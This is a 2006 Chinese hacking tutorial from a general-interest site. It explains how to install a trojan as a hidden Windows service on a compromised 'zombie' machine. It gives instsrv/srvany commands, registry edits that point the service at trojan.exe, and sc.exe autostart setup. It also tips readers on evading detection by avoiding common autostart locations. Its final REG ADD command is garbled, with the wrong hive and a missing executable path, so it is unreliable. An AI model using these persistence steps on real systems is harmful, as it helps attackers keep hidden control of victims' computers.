博客 | 彩信 | 影视 | 两性 | 笑话 | 文学 | QQ酷 | 游戏 | 动漫 | 健康 | 人才 | 星座 | 心理 | 网摘 | 图库 | 下载 | 旅游 | 交友 |
社会百态 | 美图写真 | 精彩网文 | 动漫卡通 | 搞笑猎奇 | 历史军事 | 文化旅游 | 明星娱乐 | 两性话题 | 恐怖灵异 | FLASH小游戏 |
您的位置: 首页>冲浪宝典>网络其他>正文
 

让马儿注册为系统服务

时间:2006-5-29 11:11:54 | 来自:网络收集 | 浏览:收藏到新浪ViVi 收藏到365KEY

让马儿注册为系统服务


一般木马启动的办法不外乎以下几种:
1.启动组
2.autoexe.bat
3.注册表
4.win.ini
5.sysytem.ini
6.winstat.bat
7.*.inf
8.*.autorun
那么我们如何把自己的马儿注册为系统服务,从而增强其隐蔽性呢?下面是实现办法:
我们所需的工具已经由微软提供在win2000 resouce kit工具包里,名为instsrv.exe srvany.exe reg.exe sc.exe当然还需要配置好的马儿,
就叫trojan.exe吧。我们先telnet上肉鸡,将上述工具copy到system32目录下,下面就开始行动啦,命令为instsrv.exe myservice srvany.exe。
这样就已经注册了一项系统服务,名为myservice,下面就要操作注册表,我们要在heky_local_machine\system\currentcontrolset\services找到我们刚才添加的myservice,新建一个键,名为parameters,在parameters下新建键名为application,类型为reg_sz,数据值就是c:\winnt\system32\trojan.exe. 
那么我们如何实现以上操作呢?偶提供两种办法,一现在自己机机上操作,将heky_local_machine\system\currencontrolset\services-parameters导出为srv.reg一并传到肉鸡,然后运行reg.exe /import srv.reg .这样就将KO了。另外一种就是用reg.exe手动添加。reg.exe的用法如下: 
F:\tools\nettools>reg
REG QUERY /?
REG ADD /?
REG DELETE /?
REG COPY /?
REG SAVE /?
REG RESTORE /?
REG LOAD /?
REG UNLOAD /?
REG COMPARE /?
REG EXPORT /?
REG IMPORT /?

ROOTKEY [ HKLM | HKCU | HKCR | HKU | HKCC ]
SubKey The full name of a registry key under the selected ROOTKEY
valueName The value name, under the selected Key, to add
/ve add the empty value name <no name>
Type [ REG_SZ | REG_MULTI_SZ | REG_DWORD_BIG_ENDIAN 
|REG_DWORD | REG_BINARY | REG_DWORD_LITTLE_ENDIAN 
|REG_NONE | REG_EXPAND_SZ ]
If omitted, REG_SZ is assumed
Separator Specify one charactor that you use as the separator in your data
string for REG_MULTI_SZ. If omitted, use "\0" as the separator
Data The data to assign to the registry valueName being added
/f Force overwriting the existing registry entry without prompt
每次都会返回代码0,1 0表示成功,1表示失败:(。
下面就是一个例子:REG ADD HKLM\Software\MyCo /v Path /t REG_EXPAND_SZ /d %"systemroot"%
Adds a value (name: Path, type: REG_EXPAND_SZ, data: %systemroot%)
Notice: Put the double quote ( " ) inside the expand string
根据这个例子不难看出,我们要添加的服务的命令应该是:REG ADD HKCC\system\currentcontrolset\parameters /v myservice /t reg_sz /d c:\winnt\system32 嘿嘿!好了马儿就变成服务了呀,下面就运行trojan.exe吧,另外你需要用sc.exe来congfig一下,将myservice配置为auto,sc.exe 大家用的多了,偶就不多废话了。
^_^加上马儿的自我保护,你的马会不会变成“不死神马”呀!注意尽量不要让木马以开头提到的8种方法启动,以免被查出trojan.exe的路径而被删除掉。


打印
上一篇:winnt常用的一些后门 下一篇:cookie欺骗教程 

版权申明:
  本站属于54stu个人网站,大部分文章来自网络搜集,大家可以自由转载本站的文章,但原作者和来自我站的链接必须保留。文章版权归原作者所有。
  五四电脑技术资讯网(54stu.com)依法保护知识产权,如果我们的文章有涉及或侵犯您的有关权益,请即时与我们联系,注明网址及文章,我们会即时处理或删除,感谢您的合作!

站点最新

·商务实用主义 惠普M2008全面体验
·DELL的首款Sonoma笔记本配置详细
·感受迅驰2代笔记本 性能提升有多
·半岛镁盒 微星MEGABOOK S250评测
·亚洲人理想尺寸 富士通S6230评测
·东芝S100有话说:别把轻薄不当事儿
·戴尔 HP勒马6999 静待联想兵发祁
·性价比与特色比翼 5月笔记本市场
·6999元华硕AMD闪龙笔记本配镭920
·6月7日本本知识库-小技巧有大智慧
·用遥控器玩本本:HP DV4016全面试
·炫龙使者:神舟承龙T280笔记本评测
·搞怪!笔记本发展史上的5个另类的
·最轻薄Sonoma!东芝1.3Kg新秀R200
·进退维谷:细算国产笔记本六大弱点
·售价6千6 日系AMD笔记本又添新丁
·你的本本是样品么?
·暑促专题:暑期热销本本推荐——
·关注!6000元以下本本全攻略
·时尚首选 海尔W11笔记本全面评测
·X700移动版成绩曝光,华硕A6Va测
·能用么 4880元神舟游戏NB全面考量
·落幕前的辉煌!Joybook 7000高端性
·续航8小时!IBM ThinkPad X41T图评
·初涉职场选本记 体验联想旭日150
·2008奥运通信,网通准备好了吗?
·6999元东芝L10笔记本终于进行促销
·MSI 微星S260评测确实一分钱一分
·更轻更薄更快 夏新T30 Sonoma小本
·延续M2经典,东芝Portégé S100新

站点推荐

Adobe Premiere 6.0认证考试大纲
网络工程师专业术语大集合之路由

支持我们
 
五四娱乐网--新五四,新娱乐!-WwW.54stu.com 用心生活-娱乐万家(本站法律顾问:陈律师)
五四娱乐网版权所有 All Rights Reserved 蜀ICP备05025894号  投诉QQ:3458124